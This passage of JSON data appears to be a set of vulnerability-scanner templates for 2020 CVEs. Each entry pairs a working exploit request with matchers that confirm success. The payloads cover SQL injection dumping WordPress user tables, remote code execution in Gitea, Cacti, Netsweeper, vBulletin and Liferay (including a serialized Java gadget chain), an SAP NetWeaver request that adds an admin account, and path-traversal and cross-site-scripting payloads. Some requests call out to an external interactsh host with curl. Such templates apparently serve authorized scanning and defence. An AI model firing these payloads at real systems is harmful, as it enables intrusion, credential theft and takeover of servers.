Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35847","info":{"name":"Agentejo Cockpit <0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","POST /auth/requestreset HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"user\": {\n    \"$func\": \"nonexistent_function\"\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_1","regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_1","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"(error404)([A-Za-z0-9-.@\\s-]+)\""]},{"type":"regex","part":"body_2","negative":true,"regex":["string\\([0-9]{1,3}\\)(\\s)?\"([A-Za-z0-9-.@\\s-]+)\""]}]}]},{"id":"CVE-2020-13851","info":{"name":"Artica Pandora FMS 7.44 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["text/html","PHPSESSID="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML feed"]}]},{"raw":["POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17463","info":{"name":"Fuel CMS 1.4.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-36510","info":{"name":"WordPress 15Zine <3.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/15zine/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/15zine/assets/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-6950","info":{"name":"Eclipse Mojarra - Local File Read","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF","{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"<web-app\", \"<servlet>\") || contains_all(body, \"<faces-config\", \"</faces-config>\")"],"condition":"and"}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-11110","info":{"name":"Grafana <= 6.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nReferer: {{BaseURL}}\ncontent-type: application/json\nConnection: close\n\n{\"dashboard\":{\"annotations\":{\"list\":[{\"name\":\"Annotations & Alerts\",\"enable\":true,\"iconColor\":\"rgba(0, 211, 255, 1)\",\"type\":\"dashboard\",\"builtIn\":1,\"hide\":true}]},\"editable\":true,\"gnetId\":null,\"graphTooltip\":0,\"id\":null,\"links\":[],\"panels\":[],\"schemaVersion\":18,\"snapshot\":{\"originalUrl\":\"javascript:alert('Revers3c')\",\"timestamp\":\"2020-03-30T01:24:44.529Z\"},\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{\"from\":null,\"to\":\"2020-03-30T01:24:53.549Z\",\"raw\":{\"from\":\"6h\",\"to\":\"now\"}},\"timepicker\":{\"refresh_intervals\":[\"5s\",\"10s\",\"30s\",\"1m\",\"5m\",\"15m\",\"30m\",\"1h\",\"2h\",\"1d\"],\"time_options\":[\"5m\",\"15m\",\"1h\",\"6h\",\"12h\",\"24h\",\"2d\",\"7d\",\"30d\"]},\"timezone\":\"\",\"title\":\"Dashboard\",\"uid\":null,\"version\":0},\"name\":\"Dashboard\",\"expires\":0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"deleteKey\":","\"deleteUrl\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"url\":\"([a-z:/0-9A-Z]+)\""],"part":"body"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/canto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Canto","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup 